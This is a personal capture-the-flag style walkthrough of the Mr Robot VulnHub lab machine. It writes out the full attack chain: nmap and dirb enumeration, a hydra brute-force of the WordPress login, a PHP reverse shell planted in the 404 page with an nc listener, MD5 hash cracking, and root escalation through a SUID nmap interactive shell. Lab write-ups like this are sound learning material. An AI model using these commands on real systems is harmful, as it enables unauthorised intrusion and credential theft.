Skip to main content

vulnhub robot notes

I did the eJPT a while back and hadn't really looked at any practical security content since then, so though I'd spin up a VulnHub VM. I'm just going to outline the broad steps I took to completion as this is more a note taking entry. I will list at the end any major rabbit holes I went down.

This VM has three keys to find and is listed as beginner-intermediate. Mr Robot on VulnHub

After a quick scan on the internal subnet I ran a scan against the discovered VM address and found the following:

PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 08:00:27:5D:81:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11

A quick view of the webpage shows an animated message so to get a better look at what's hosted on the webserver I ran a quick dirb. There were a lot of directories discovered, so I'm truncating what I think are most useful to look at next.

dirb http://10.10.100.50

http://10.10.100.50/robots.txt
http://10.10.100.50/wp-login
...

A quick look at robots.txt gave one of the three keys plus more importantly, a .dic file which when downloaded contains a large dump of passwords. wp-login obviously shows us this is a WordPress site. I tried a few random logins and given the name of the VM correctly guessed a username:

Next step was to try brute-force the WordPress site using the guessed username elliot and the downloaded password dump fsocity.dic

hydra -l elliot -P ~/Downloads/fsocity.dic 10.10.100.50 -F -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

[80][http-post-form] host: 10.10.100.50   login: elliot   password: ER28-0652

So next step was to try get a reverse shell, I set a listener on sudo nc -lvp 6666 and added some reverse shell code from https://github.com/pentestmonkey/php-reverse-shell to the WordPress 404 page on the site then once called, the reverse shell listener was connected:

admin01@kali-1:~$ sudo nc -lvp 6666
listening on [any] 6666 ...                                                               
10.10.100.50: inverse host lookup failed: Unknown host                                         
connect to [10.10.100.51] from (UNKNOWN) [10.10.100.50] 44199                                  
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 09:51:53 up 12:39,  0 users,  load average: 4.71, 4.97, 5.05                                
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                             
uid=1(daemon) gid=1(daemon) groups=1(daemon)                                                  
/bin/sh: 0: can't access tty; job control turned off
python -c 'import pty; pty.spawn("/bin/sh")'
$ whoami
daemon
$ hostname
linux

After a bit of looking around I found the second key however I don't have access to read it, there is an md5 encrypted password listed so going to try running that through John The Ripper.

$ pwd           
/home/robot
$ ls  
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ ls -al
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Copied the string to my VM and ran the following

sudo john --format=raw-md5 ./robot-pass.txt

With John the Ripper running (see notes below) I tried a few online md5 conversion sites and one https://md5.web-max.ca came up good:

A quick su to the robot account and I got the second key:

robot@linux:~$ whoami
whoami
robot
robot@linux:~$ pwd         
pwd
/home/robot
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Checking for any interesting SUID or GUID executables I saw that nmap was installed and had the SUID bit set with an owner of root (tut tut!)

$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
.
.
.
/usr/local/bin/nmap

I was able to run it in interactive mode and get the last key

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
nmap> !ls /root
firstboot_done  key-3-of-3.txt
nmap> !cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

rabbit holes

  • I did try to brute-force ssh using the discovered username and password dump but got an immediate connection refused, seems it's key based authentication only.
  • John the Ripper default settings didn't crack anything after many hours, I did try later using the downloaded .dic password file AND the --rules flag and it did discover the password.
  • Before going down the SUID route I compiled multiple Kernal exploits listed in exploit-db as the Kernel was running 3.13.0, but none of them ran successfully.